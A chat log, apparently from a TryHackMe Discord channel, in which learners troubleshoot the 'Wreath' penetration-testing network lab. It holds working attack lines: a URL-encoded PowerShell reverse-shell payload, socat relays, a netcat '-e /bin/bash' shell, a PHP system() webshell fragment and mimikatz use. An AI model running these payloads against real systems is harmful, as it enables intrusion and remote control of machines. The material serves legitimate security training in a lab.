#wreath-network
i am not able to install chisel in my OS
error message?
Anyone else here working on 10.200.96.200? Can't ping the box... Just started with wreath and trying to enumerate the webserver... I see 3/8 to reset the Network
VPN is up
wait for 5 mins it will
unable to locate the chisel
screenshot what you're doing
okay wait
which task are you on? 14?
$ sudo apt install chisel
[sudo] password for kash:
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package chisel
nop
36
in task 14: "Before we can use chisel, we need to download appropriate binaries from the github page", with a link
yes i saw Darkstar video
well, I'm just going off the instructions in the room
okay wait i think i got something
hah, Muiri, Thomas uses cmder ❤️
Or, I do, and needed to develop a website
you have a sshuttle to .150?
and an evil-winrm shell there? And an open firewall port? And a chisel server there? And a chisel client on your machine? And your proxy configured?
yes sir!
does your chisel client on your local machine say it's connected?
yes sir!
how'd you configure the proxy?
- sshuttle
then on windows machine chisel server and on my machine chisel client
then i try to open the page on 10.200.90.100
i will see tomorrow now
i'm betting your proxy is wrong
did you skip the proxychains.conf and foxyproxy setup?
I'm having a heck of a time trying to upload a file to my local updog server from the .100 machine using curl. I've tried a variety of commands and options, many variations on:
curl -F "file=@C:\full path\output.txt" --url <my ip:port>, but curl doesn't like any of the things I've tried. I've been googling and trying a bunch of stuff. Any tips/suggestions?
Muiri- is c:\windows\temp\ supposed to be writable on the .100 machine? I thought I had previously used the php shell to curl netcat there, but it's not there now, and I can't write anything to that dir
there are many instances of the wreath network. Which one are you one (third octet of the IP) ? What are you doing when you get that error? ssh? browser? other?
nvm it works rn
have got some issues too, can't reach 10.200.111.200 anymore.
Network is up for 42m
i've already regenerated the *.ovpn, host still not resolvable
Tried ssh, http and icmp btw
On task 42, I've compiled and copied my wrapper.exe to the target. When I execute it, I get the following error:
Unhandled Exception: System.ComponentModel.Win32Exception: The file or directory is corrupted and unreadable
at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo)
at Wrapper.Program.Main()
The program compiled without warnings or output of any kind, and the 'file Wrapper.exe' shows the same output as shown in the task42 instructions. Has anyone seen this before/have any ideas?
the only thing I can spot that I did differently than the instructions is the path to nc-name.exe. In my case, I had to put it in the xampp /uploads dir, because c:\windows\temp is not writable for me (or from the php web shell). I think that changed since yesterday. Perhaps something/someone changed the permissions? The network reset about 18hr ago (not sure if it's been reset since then)
I've tried recompiling the .cs file with different paths: "%TEMP%\nc.exe", "c:\Users\T...\AppData\Local\Temp\nc.exe", no path (just filename), "C:\xamp....\uploads\nc.exe", etc. All of them give me the same error, except for the %TEMP%, which gives a 'system cannot find the file specified' error.
So am I compiling this thing wrong? Is it something broken on my machine? Or is this a directory permissions issue on the .100 box?
Should be nc-username...
it is. I just shortened that here for brevity
I have a problem with the CVE-2019-15107 exploit at the beginning. Always got the output [-] Failed to connect to http://10.200.80.200:10000/. Can someone help me (no vpn problem)
I don't recall having to put a port on mine. Maybe that's the issue?
I didn't do it either. The command I used was python3 CVE-2019-15107.py 10.200.80.200
Sorry, I was looking at the wrong python file. That one does have a -p port option, which defaults to port 10000. But if it can't connect, maybe check to make sure the network is up, the host is up, and you're on the vpn?
No problem. I tried pinging the computer and restarting the VPN but it has no effect.
what does your ping return?
the normal output 64 bytes...
so no packets lost?
can you connect to the web server on the .200 machine, port 10000?
i'm not sure, sorry 😦
Honestly sounds like your VPN is not connected.
I think not, bc I'm able to ping it and open the webserver on port 80
Ok, then it sounds like someone broke the machine. You'll want to vote for a reset.
I already did, just have to wait for 5 more people to vote, but thanks
found the issue with my wrapper.exe- the nc-name.exe had gotten corrupted somehow. Had to re-transfer it
Muiri- typo, task 43 "Mimkatz passed Defender" should be past, I think.
Sorted
You, sir, are speedy
Minor nitpick on the copying/moving command- some people might not initially see that you have to copy both (since you only show one command). I did a move *.bak ....., but I could see some people skipping the second file
I can't delete my %TEMP%\nc-emptybuffer.exe- I think because it's still in use with my revshell
also, is there something doing an auto copy between ||c:\windows\temp, c:\users\T...\temp, and c:\xampp...uploads|| ? I see duplicate files there that I'm pretty sure I didn't put in those places.
Just finished the room. Very, very well done/written, Muiri. Huge thanks for putting all that together!
cool!
Muiri, if you have a minute, can I DM you about something?
Muir's just gone to bed
Ah, okay. Good
The patches were all rolled out earlier in the week. What seems to be the problem?
oh I wasn't in the know :) sorry
No worries, just checking if there was another issue we missed.
is it necessary to make an ssh connection from my machine to the machine i got a reverse shell on, in order to access the second in the chain?
asking this bcs im stuck at task 18
I have a problem getting to the ||gitstack|| side of the network after sshuttle it says connected but when I put the ip in browser then i get thomaswreath.thm webpage. Any idea why?
you using the right ip address for gitstack?
From my Nmap scan from the server(binary)? Yes
top of task 18 "Thinking about the interesting service on the next target that we discovered in the previous task, pick a pivoting technique and use it to connect to this service, using the web browser on your attacking machine! "
which ip address are you connecting to or trying to (can spoiler tag it I guess)
||10.200.91.200||
ok thats the prod-serv
Yep
Mmmm
(though only one will be accessible)
I sure would try again
Ty
I'm imagining you thought sshuttle would redirect the traffic of its own host but it actually just acts as a network pivot for your attacker machine to access what it can access.
when i try to connect via shuttle it says key file permissions too open but when i change them to 600 it errors out saying permission denied
Hey guys is someone blue teaming the main server on the Wreath network?
The port running the vulnerable service is closed and I think the SSH key has changed...
haha
yea that is true
I just checked, port 10000 is now closed and the ssh key have been changed
Pls vote for reset the network!!
and PLS be kind! do not mess things up for other users!
pls be kind and don't dm ppl without asking

also not everyone on wreath is on the same "network" as I believe there are multiple instances of it
so you might just have to wait for Muir or someone to check it out, maybe try another room in the meantime
When you're asking for a reset, you need to specify what network you're on. That's shown by the 3rd octet in the IPs.
How did you solve the bonus question in task 20? About adapting the code..
I would suggest having a read through the first exploit (from my Github) to see how the pseudoshell there works
Essentially you would add a while True: loop at the end of the exploit to accept a command from the user and send it off in a web request to your shell, at the simplest level
Okay easy thanks
when i type "shell" in the pseudoshell i get asked to enter the IP of the server, i cannot enter anything there
is it only me?
Muiri, if/when you have a minute, I have a DM question for you
Go for it
do i have to setup a reverse connections via ssh ? for task 18
I don't have my notes in front of me, but you need ssh for the .200 box, and a sshuttle connection (or something else) for .150 and beyond
hmm yh i get an error when trying sshuttle -r root@10.200.112.200 --ssh-cmd "ssh -i id_rsa" 10.200.112.0/24 -x 10.200.112.200
Permissions 0644 for 'id_rsa.pub' are too open.
do i also have to chmod it to 600?
yep
root@10.200.112.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
c : fatal: c : failed to establish ssh session (2)
when i chmodded the .pub key to 600 :/
bcs... i am dumb >.<
but then i get this error when using the private key
└─# sshuttle -r root@10.200.112.200 --ssh-cmd "ssh -i id_rsa" 10.200.112.0/24 -x 10.200.112.200 99 ⨯
Load key "id_rsa": invalid format
root@10.200.112.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
c : fatal: c : failed to establish ssh session (2)
The command there shows just id_rsa so I'm confused
That "error" about invalid format doesn't usually prevent you logging in
Someone might have broken the box, check that the public key in authorized_keys hasn't been changed
I can still access it
Are you on 112?
oh my bad, im not
yes via reverse shell atm
Was talking to pi0neer
oh sorry
make sure the last line of the id_rsa file is blank. That might be the source of the invalid format error
thank you! that fixed it
I made that mistake before. Took me forever to figure that one out 🤦‍♂️
i could only imagine how much hair you had to pull out of your head lol xd
I may have found an issue with the questions on thm. On task 17 you are supposed to name the other machines' ip addresses and the solutions offer 100 and 150 (as the last octets of the ip). However, when I scan the network, it tells me that 150 and 250 are the machines that are on the network. I've tried a bash one-liner and nmap 🤷
My guess would be your network is bugged. Which network are you on (third octet of the IP)?
107
Perhaps Muri or James can comment on that. I can't really help there, sorry.
its weird because I was on another network before (118) and the scan performed the same
That's odd. I'm relatively confident they are supposed to be 200, 150, 100 for all, but I could be wrong.
250 is the VPN server. 100 might have been shutdown
Ohh alright, can I switch the network?
i have a question. I am currently in task 10 proxychains and foxy proxy
for using proxychains do i also have to start local port forwarding on the attack box?
i have a problem getting the full reverse shell, when i type 'shell' in the pseudoshell it asks me for input. i cannot enter anything then
did anyone else have this?
is there anyone who can see if my target is broken? I see alot of error messages
If this is not the case, please check your IP and chosen port
If these are correct then there is likely a firewall preventing the reverse connection. Try choosing a well-known port such as 443 or 53 ... this is what i have been getting all day long
i wonder how some other people have been able to accomplish this
seems fairly straight forward when i watch Darksec's video
yes i watched the video from dark, there he just types 'shell' in the pseudoshell
he then enters his IP, this does not work for me (ie i cannot even enter anything and the pseudoshell is in a dead state)
and when i log in there are error messages about something (did not see that in his video)
whoami
Unhandled exception in event loop:
File "/usr/lib/python3.9/asyncio/events.py", line 80, in _run
self._context.run(self._callback, *self._args)
File "/usr/lib/python3/dist-packages/prompt_toolkit/input/vt100.py", line 168, in callback_wrapper
callback()
File "/usr/lib/python3/dist-packages/prompt_toolkit/application/application.py", line 673, in read_from_input
self.key_processor.process_keys()
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_processor.py", line 274, in process_keys
self._process_coroutine.send(key_press)
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_processor.py", line 186, in _process
self._call_handler(matches[-1], key_sequence=buffer[:])
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_processor.py", line 329, in _call_handler
handler.call(event)
File "/usr/lib/python3/dist-packages/prompt_toolkit/key_binding/key_bindings.py", line 102, in call
result = self.handler(event)
File "/usr/lib/python3/dist-packages/prompt_toolkit/shortcuts/prompt.py", line 796, in _accept_input
self.default_buffer.validate_and_handle()
File "/usr/lib/python3/dist-packages/prompt_toolkit/buffer.py", line 1877, in validate_and_handle
self.append_to_history()
File "/usr/lib/python3/dist-packages/prompt_toolkit/buffer.py", line 1385, in append_to_history
self.history.append_string(self.text)
File "/usr/lib/python3/dist-packages/prompt_toolkit/history.py", line 73, in append_string
self.store_string(string)
File "/usr/lib/python3/dist-packages/prompt_toolkit/history.py", line 294, in store_string
with open(self.filename, "ab") as f:
Exception [Errno 13] Permission denied: 'commands.txt'
roots ENTER to continue...
like that
@hallow eagle you're running the exploit somewhere you don't have permission to write to
can anyone help me out i am stuck hop module
but I am getting compilation error
that was stupid, ty
got it
hi! webserver seems destination unreashable
*unreachable
a restart of my kali guest solved it
I am having real problems with task 20 on wreath, I'm hoping someone can help.
I'm successfully running commands on git-serv using the specified exploit.
I'm running nc -lvp 8888 on my local machine.
I have a shell on prod-serv and have run ./socat tcp-l:15667 tcp:10.50.85.65:8888 & which is still running in the background.
I have confirmed that git-serv can talk to prod-serv on 15667 and I can create a reverse shell from prod-serv to my local machine (10.50.85.65) on 8888
I don't understand why my reverse shell from git-serv doesn't get forwarded to my local machine and I'm not sure how to troubleshoot this.
This room is killing me
hey guys
if i let the network sleep, are my sessions like ssh etc ... gonna be terminated?
Yes
Try connecting to your relay from your attacking machine
If you can do that then the firewall is configured correctly
If you still have the key you can connect back
Hi all, is it just me or Wreath is being very slow?
SSH connection randomly drops out and is slow to connect back on
That sounds like a VPN thing to me. Are you on the AttackBox?
from the attacker's box **
Are you using your own VM or the THM AttackBox?
THM AttackBox
Did you start the VPN manually?
I will restart the system and try again, thanks a lot
Don't start the VPN directly -- it does it automatically
Is the vpn inside the attackbox associated in any way with my private ovpn connection, as in if I had both my VM and the attackbox connected will these clash together?
If you have the Wreath VPN connected in two places then there will be problems
But connecting the Wreath VPN alongside your regular VPN is fine
makes sense now thank you @merry robin
one more thing if I may ask, in task 19 I updated the IP address and converted from dos2unix and updated the exploit to exploit-myusername.php but I get a 404 when I run the exploit. it says the credentials are not correct. am I missing something here? there wasn't any reference to credentials in the task docs. I am using sshuttle to pivot
It sounds like you might have edited the wrong part of the exploit
it's working now thanks! I am ashamed of what the pitfall was
Question: if I share a local folder on a newly created user account on .150, will it be shared in my current session/user or system wide with any users using the system?
I'm at task 13 and trying to get a reverse shell with socat to my attacking machine.
I transferred both socat and nc executables on production server.
upon running nc on production server to get a reverse shell i get the following error. 2021/04/11 05:08:46 nc-drunkenstein[2510] E exactly 2 addresses required (there are 4); use option "-h" for help. I used the following commands ./socat-drunkenstein tcp-l:8000 tcp:10.50.93.52:443 & and ./nc-drunkenstein 127.0.0.1 8000 -e /bin/bash
here is a screenshot
@open nebula your socat thinks it's netcat there
i.e. you seem to have uploaded them the wrong way round
I used curl to upload them. What should I do now?
Excellent idea, thanks
No dice I'm afraid.
My machine: nc -lvnp 4444
Web Server: ./sikotic-socat tcp-l:15666 tcp:10.50.85.65:4444 &
Payload: curl -X POST http://10.200.84.150/web/sikotic-exploit.php -d 'a=powershell.exe%20-c%20%22$client%20=%20New-Object%20System.Net.Sockets.TCPClient('10.200.84.200',15666);$stream%20=%20$client.GetStream();%5Bbyte%5B%5D%5D$bytes%20=%200..65535%7C%25%7B0%7D;while(($i%20=%20$stream.Read($bytes,%200,%20$bytes.Length))%20-ne%200)%7B;$data%20=%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes,0,%20$i);$sendback%20=%20(iex%20$data%202%3E&1%20%7C%20Out-String%20);$sendback2%20=%20$sendback%20+%20'PS%20'%20+%20(pwd).Path%20+%20'%3E%20';$sendbyte%20=%20(%5Btext.encoding%5D::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()%7D;$client.Close()%220'
Web Server firewall:
[root@prod-serv ~]# firewall-cmd --list-all
public (active)
target: default
icmp-block-inversion: no
interfaces: eth0
sources:
services: cockpit dhcpv6-client http https ssh
ports: 10000/tcp 21059/tcp 15666/tcp
protocols:
masquerade: no
forward-ports:
source-ports:
icmp-blocks:
rich rules:
What am I not understanding?
EDIT:
I've also just run ./sikotic-nc 127.0.0.1 15666 -e /bin/bash on WebServer and got a reverse shell, so I think the firewall and relay are working correctly, but my payload doesn't work.
Very frustrating, it was the URL encoding in CyberChef. When I used your suggested website it worked.
This room is incredible but I completely underestimated how much I was going to learn.
Does anyone know why the webmin exploit is executed on port 80 and not 10000? (Like: exploit.py $IP:10000)
Oh nvm
Just read the code arguments
Anyone else getting a Failed to connect to http://10.200.80.200:10000/ error when trying to run ./CVE-2019-15107.py? I'm connected to the Wreath VPN btw.
Since the IPs have changed, i had to get a new || ssh key for machine-1|| but its always telling me || invalid format ||
didnt have that problem before
The keys aren't different tho
With my old one it refused the connection
Oh yeah theyre the same
didnt even notice
i reverted the key and its still invalid format 
Refused connection = closed port
why should the ssh port be closed?
Either the network is asleep or someone is trolling
Hi Guys I want send Json Data to target Ip how can i do it?
Sample: 89.163.142.192:30120/players.json
@brittle steeple
A) What does that have to do with Wreath?
B) Why are we targeting public IPs?
What?
What's on that IP?
Good morning all. Looking for a bit of guidance on stabilizing the wreath remote shell
I've been trying for two days now and it keeps breaking the Shell
As soon as I foreground netcat it just completely breaks and just types characters when I hit ENTER or CTL+C
I'm on task 13 and trying to get the reverse shell, I uploaded both netcat and socat executed the command but I don't get the reverse shell
and also I wasn't able to curl to get those binaries
so I used scp to upload it
I'm stuck on task 6 because I just cant get past stabilizing the damn thing
Didn't think you need to run netcat as root. I don't think I can help you but once I get to that question, if ever, I'll see what's up
for lower ports you have to run it with root perms
ports lower than 1000 require permissions bro
1024, technically
yeah
Learned something new today. Thanks guys
seems like webserver (.200) on my network is down (3rd octet of my network = .101) can anyone check it?

@fair breach is 101 down by any mischance?
Lemme take a look
@merry robin
.101.250 which is the vpn which is up the rest are stopped
@jaunty oak is the network started?
it is working now. thank you
hello there
can anyone help me reset network?
am VIP and still there is reset button
idk how this is going xD
You need to specify which subnet you're on
Otherwise people won't know what network needs to be reset
ah how I tell?
Should be the third part of the ip
the 3rd octet of your ip
I've just started to exploit the network and it seems Port 10000 is closed and is refusing connections?
Is the network started?
If it's running and has been up for more than about 5 minutes, go for a reset
Alright
I clicked reset it says 1/8
If someone's been messing around and brought a machine down, you'll find that the others in the network go for resets pretty quickly as they won't be able to access it either
Not until I get my fancy management interface
ok
woah
Someone plz gib Muir and cry and spuki some nice management interfaces
They're in the works
for just networks right? just wondering 
hey guys, i got some questions over here
any of you can reach the 10.200.106.150 machine after setting up sshuttle to the .200 server?
it appears to be up, since i can run an nmap scan to .150 from the .200 server, but when i pivot with sshuttle i can't open the webpage on port 80 in my browser

whats the error
404 :/
So you can open it
exactly :/
idk if im missing something
sshuttle -r root@10.200.106.200 --ssh-cmd "ssh -i id_rsa" 10.200.106.0/24 -x 10.200.106.200
Specifically, you trying to access something that doesn't exist. Pretty sure that's also stated as the expected outcome in the room
All good
can I have private wreath network? I can pay
That would be an admin question -- drop an email to support@tryhackme.com
!!
I'm assuming you'll pass it to Skidy/Ashu Jabba 🤷‍♂️
They're super busy, I'll see if I can get an answer and get it pinned here
Private Wreath Networks
Hey!
We do create private Wreath networks.
Please send all private Wreath network enquiries to ben@tryhackme.com :)
@simple spire ^
Oooh, cool

I am having difficulty in a task, when I try to run the exploit it returns me the following error:
./43777.py
[+] Get user list
Traceback (most recent call last):
File "./43777.py", line 46, in <module>
r = requests.post("http://{}/rest/user/".format(ip), data={'username':username,'password':password})
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 119, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/api.py", line 61, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 530, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 665, in send
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 245, in resolve_redirects
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 643, in send
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/adapters.py", line 516, in send
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='thomaswreath.thmrest', port=443): Max retries exceeded with url: /user/ (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f8d71bd7b90>: Failed to establish a new connection: [Errno -2] Name or service not known',))
thomaswreath.thmrest there's the issue
but on my "hosts" it's OK, thomaswreath.thm
Yes but that URL there looks wrong. Did you edit the exploit or are you supplying the URL as an argument?
Also, it says IP so did you try with the ip?
Yes, I edited the exploit, put the IP I'm going to try through DNS
There is no DNS
I downloaded the exploit again and edited it and it worked, some dirt had been left in the exploit, but now it gave a different error ...
"
Notice: Undefined index: a in C:\GitStack\gitphp\exploit-tiagobob.php on line 1
Warning: system(): Cannot execute a blank command in C:\GitStack\gitphp\exploit-tiagobob.php on line 1
"
webserver shows this error
Best name ever: TiagoBob
I identified that the flaw is in this part of the exploit
'p && echo "<? php system ($ _ POST [' a \ ']);?>">
anyone else having issue with connecting to the smbserver?
net use \\<attacking-ip>\share /USER:user s3cretP@ssword
System error 53 has occurred.
The network path was not found.
Ok. The problem was my firewall.
Wreath does not count as an entryway to the 'advanced' discord channel, correct?
Not as of yet certainly. Haven't really considered it
In the wreath room, i am getting pings for the first system(.200) but for the other 2 (.150, .100) I am not getting any pings. Yesterday I was able to get into 2nd system. I even tried to run the exploit 43777.py and it's giving "connection timed out". I was even able to get a shell from .200, but no response from .150 and .100. What should I do? Should I vote to reset the system?
Anyone? Any suggestions ?
You probably wouldn't be able to ping them anyway, given they're Windows boxes -- although that definitely doesn't look to be connecting
To confirm, you do have sshuttle running, yes?
Anybody else having connectivity issues?
I'm not getting any ping response from the server
I don't think you need to be connected with sshuttle, since that is the first exploit to be run @astral pendant
That exploit is for the .200 machine if I'm not mistaken
Which server?
Sometimes the network dies because there is no activity for a while
So try refreshing the page and see if the network is running
Networks aren't based on activity, you need to actually extend them manually
Oh ok
I thought activity also had a role in the network uptime
cuz of this
But what if we are in the same network, and you have an hour and a half
Will I also have an hour and a half?
Nope.
Yes.
Oh ok, nice!
My VPN crapped out so I just restarted it and it's all good
Nicee
sry a little late but you can use powershell to look at found threats using
Get-MpThreatDetection
I'm having a problem with the ||SSH Key|| on machine-1
It keeps saying "invalid format"
I had the same problem try adding a blank line in the end of your private key. That solved it for me
can some of you help me restart the wreath network as it seems that the main public facing server is down. I just need 3 more votes to restart the network. I would really appreciate your help. Thanks in advance
i am getting the same issue now
Looks like reboot is taking place! @fresh fossil
What fixed my issue is that for whatever reason my openVPN closed out so once I reconnected to wreath it was all good
In the wreath room i am stuck at TASK - 6 , when i am pasting root user's password hash i am getting an invalid response. can someone help me please?
I have checked the walkthrough video , it is working for him but not for me
Did you copy just the hash part?
yes
Does it start with $ and end with 1 ?
i have sent a screenshot of it.
I don't think that's the right hash
Yeah my hash is different
Someone's changed it.
i have included / in the response , but it still says invalid response
As I said, someone's changed it
so what should i do? to fix it?
If you're close to a reset, do that. Otherwise disconnect and DM me the VPN config
We just did a reset right before the website went down
You know there are 80 different networks, right?
Unless you both have the same third octet, you won't have reset the same one
Oh ok. I didn't know thanks
I have disconnected , and sent you my vpn config file.
This is why I love this community. Every day I learn something new
Definitely ^^
do i have to || use empire to port scan 10.200.xxx.<the other one>|| ?
nvm i figured it out
Same for me
2 more votes needed to reset
has it ever worked?
make sure you have downloaded the separate openvpn config file for wreath
Yesterday also it got reset but i didn't feel like it changed. Still had issue with second and third systems(.150 and .100)
did u download the separate ovpn config file for wreath?
Ya I had already downloaded the VPN for the wreath network and run it. Only after that i had checked the network.
The one with our username-wreath.ovpn
Right?
yes
Its running in my system..
I've regenerated the vpn for 4 times
Should i try regenerating it, will the issue be fixed??
What network are you on? What's the third octet? @echo frigate
What's the actual issue you're having at the moment?
.111
Just now when I tried nmaping the whole ip ranges. It's showing only .255 is up
You can only talk to the public web host machine, if it's working correctly
Yesterday when I tried to exploit the second system using 43777.py, its giving me error saying connection timed out even though the machine was running.
That might be your pivot.
I don't know bro, day before yesterday I tried running that same pivot and it got executed well and I was able to get into the 2nd system and done task till 24. But on the next day onwards this is what's happening.
Not your bro, but if you can talk to the first machine it's not likely to be a VPN issue
I dont know bro, but today i'm not even able to talk with 1st machine..
Still not your bro
If you can't talk to the first machine then you definitely can't pivot to the second
can that be a code error
No
or try python3 34324234.py
That screenshot which I shared was yesterday's result..
If they cannot communicate with the first machine, they definitely can't use it to pivot to the second
This is today's case..
Any suggestion guys??
If I'm wrong also, please correct me..
89
I am looking for help some reason my netcat listener wont connect to wreath machine
!docs verify
Follow these steps, then you can post images
lost possibility to connect via ssh key. before it worked perfectly; even copied again id_rsa from .200 but the issue persists: root@10.200.91.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
Try with "sudo" @river talon
sudo doesn't help / someone has to do something to authorized keys probably
Yup... then you have the wrong keys bud
Someone might have changed it. It's not necessarily a problem on their end, in fact it's unlikely to be.
It's set to not allow changes to be made, so if someone has changed it then they have actively circumvented those (assuming you're using the same key as before). Go for a reset (and let me know if it hasn't happened in a couple of hours @river talon). If I find out who changed it I will happily ban 'em.
Oh, that reminds me, I need to make the keys themselves immutable too.
hey guys I cannot ssh into .200 is there someone who's facing the same issue ? .. 😦
until yesterday I was able to
but today it's suddenly unreachable
can anyone help ?
Is the .200 down ?
Are you connected to the VPN?
yup
Have you voted to reset the network?
Actually few minutes before I had the winrm shell into the internal network but now it's not connecting and even not able to ssh into .200
yes
Is there an official announcement time or the report contest results?
Yep. Yesterday (17th) the competition ended. I've been going through the reports -- the results should be announced today
Hey, just started wreath and tried scanning the first machine. It is up but it says all ports are filtered because of no responses
nevermind im an idiot, didnt see theres a separate vpn file for wreath x)
Is the network ok? I cant ssh to any host
There's like 80+ instances of wreath, please be specific
the first server is 10.200.99.200
hay guys any help for solve this error
/tmp/socat-als3idy: error while loading shared libraries: libwrap.so.0: cannot open shared object file: No such file or directory
That's not a static copy of socat
i solve it
Im really loving the room so far but how cancer is the machine crashing every 30 min -.-
Is there any way someone can reset the lab for us? 5/8 people voted already and the rest is probably afk so we can't access the network right now
What network? There's 80+ instances of wreath running at any time
the one starting with 10.200.101.x.
Edit: thanks!
boo my ping scanner isn't working...ICMP is hard
there we go.
Who won the $?
I am currently solving task 13 (pivoting socat). I have one question: do we have to perform port forwarding --quiet and port forwarding --easy as described in the task on the compromised server?
i am currently at task 20 {gitserver exploitation} i have changed the ip addr in the exploit and done dos2unix also but the payload is not working
can someone please help?
There's a few reasons that I can think of on why this is occurring, I haven't completed Wreath although.
-> There's something wrong with your VPN.
-> There's something wrong with the network you're on.
-> It is unable to connect.
Some common fixes:
-> Run the VPNscript.
-> Vote to reset the network.
-> Make sure the information in the script has been inserted correctly.
-> Wait for someone else who has completed the network to help :)
ok :}
Another issue: whenever I run the stager payload from empire on prod-serv it crashes the network. I followed the steps from task 27
So the 10.200.101.0/24 network needs another reset now again x)
hi, I have an issue, I can use some help. when I connect to the network (10.200.101.200) I am trying to ping the attacking pc but it does not work, the target does not recognize the attacking pc after I connect through ssh... I want to learn why. not find another way to overcome this, thanks!
What IP are you pinging @steady sluice?
the private ip
Which private ip...
10.10.97.207
@merry robin sorry I forgot to tag
I dont use VPN
Even the AttackBox needs a VPN to connect to networks
It just gets started automatically
Because only a 10.50 IP can access the network. That's what the AttackBox used to connect to the machine in the first place, and that's what you need to use when connecting back.
The AttackBox starts your Wreath VPN automatically when it boots, but it's still just a VPN
so what can I do?
if the VPN start automatically I cant control it @merry robin , can I check if the VPN is on?
You can check your VPN IP with ip a s tun0 and use that
that works, thanks!
hmm, I can't seem to get sshuttle working properly against the pivot server
sshuttle -r "root@10.200.102.200" --ssh-cmd "ssh -i ../10.200.x.200/id_rsa"
10.200.102.0/24
[local sudo] Password:
c : Connected to server.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99
chisel works though
Try running that with sudo?
What OS?
Kali on WSL2
I need to look into how to set an exception for proxychains to avoid trying to proxy my display server for RDP
Has WSL2 fixed the networking problems of WSL, or is it still basically just your host with an extra layer?
it's basically a VM
Because, uh, iptables sure as heck wouldn't do anything on WSL
ah it's trying to open that locally?
Yep, that's how sshuttle works
It basically sets up an SSH local proxy then changes your firewall to add forward rules through the proxy
ok, there are no local rules defined, but it might cause issues with the host net?
there's some voodoo between them anyways
Yeah, I would imagine there isn't enough separation on WSL2 for the guest to act independently
ok there we go
localnet 172.16.0.0/255.240.0.0
localnet 192.168.0.0/255.255.0.0
This helps in the proxychains conf:)
ok mimikatz priv esc doesn't seem to be working...
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
looks like an error
thats an error maybe
Guess who forgot to run as admin
system error in you
Hence you are an AI
@merry robin any solutions?
Doesn't look like it's able to connect to 150. Make sure sshuttle is active, etc
Ok
hey Muiri! My room writeup got accepted!
But two of my writeups have been uploaded, one of which had an issue and I had reported it to you! So can you remove the writeup whose link does not work (ig the first one in the list, but check it )! Thank you
I would have accepted the second one on the list
Oh, no, I accepted both of them, oops
I'll delete the first one
Thank you!
anyone else had issues with rdp to .150 ?
tried xfreerdp and remmina
both prompt for password but fails....
creds fine as I can winrm
am I the only one having the network down since a few hours ? it worked fine until the state had to stop because of extend limit, then when it started again nothing worked, can't even nmap it, it says everything's filtered
we're at 4/8 reset
of course, just after I send that, the network stops so I restart it again and now it works
worked fine for me once I got proxychains sorted out
one thing I noticed for the Empire section: The first http listener we created was called "Webserver", but on the hop section we're asked to redirect to "Gitserver"
might cause confusion
oh my... someone was a bit literally minded
that looks like a big ncat though
kekw
Swap to -lah!
Human readable sizes or bust
exa or bust
it's apparently the static binary
specifically here, but if you want to share your general state of happiness, feel free
bah chisel is being mean on powershell
so git is pretty magical...
if I do mv C:\\...\\Website.git Website.git then I can do a git clone Website.git directly
avoids all that muck with gittools
and manually re-ordering the commit history...
just for info
woah
Aye, but then you don't learn about Git Tools
Couldn't you just clone it from where it currently is?
Why is it showing only one machine? There should be 3 machines, right?
Also I want to ask is it possible to scan this machine by uploading a static copy of nmap on production server?
I have a feeling that second question might be answered by reading further
and the first question, prod-server may not have access to the other host
in upcoming tasks?
okkie
yes
Is wreath broken? Got kicked out of all my shell sessions, nvm the machines stopped ;p
Anyone an idea why I can connect with evil-winrm but cant connect with xfreerdp ?
[09:45:00:273] [6760:6761] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success
[09:45:00:273] [6760:6761] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:45:00:273] [6760:6761] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Even with sshuttle in place and able to winrm?
I have same problem...
Not really
Sshuttle didn't work on my setup
I had one issue where it was trying to proxy my display server
what did you try?
Hi all
im trying to get a reverse shell by modifying the gitserver exploit, i have put a php simple backdoor in the command section
oops
this is the error i get back
On task 19 when trying to run the 43777.py i get the following error.
root@surreal sail:~/wreathnetwork/tools# ./43777.py
Traceback (most recent call last):
File "./43777.py", line 17, in <module>
import requests
ImportError: No module named requests
I have tried to pip uninstall / reinstall however i get the following error doing that
root@surreal sail:~/wreathnetwork/tools# pip uninstall requests
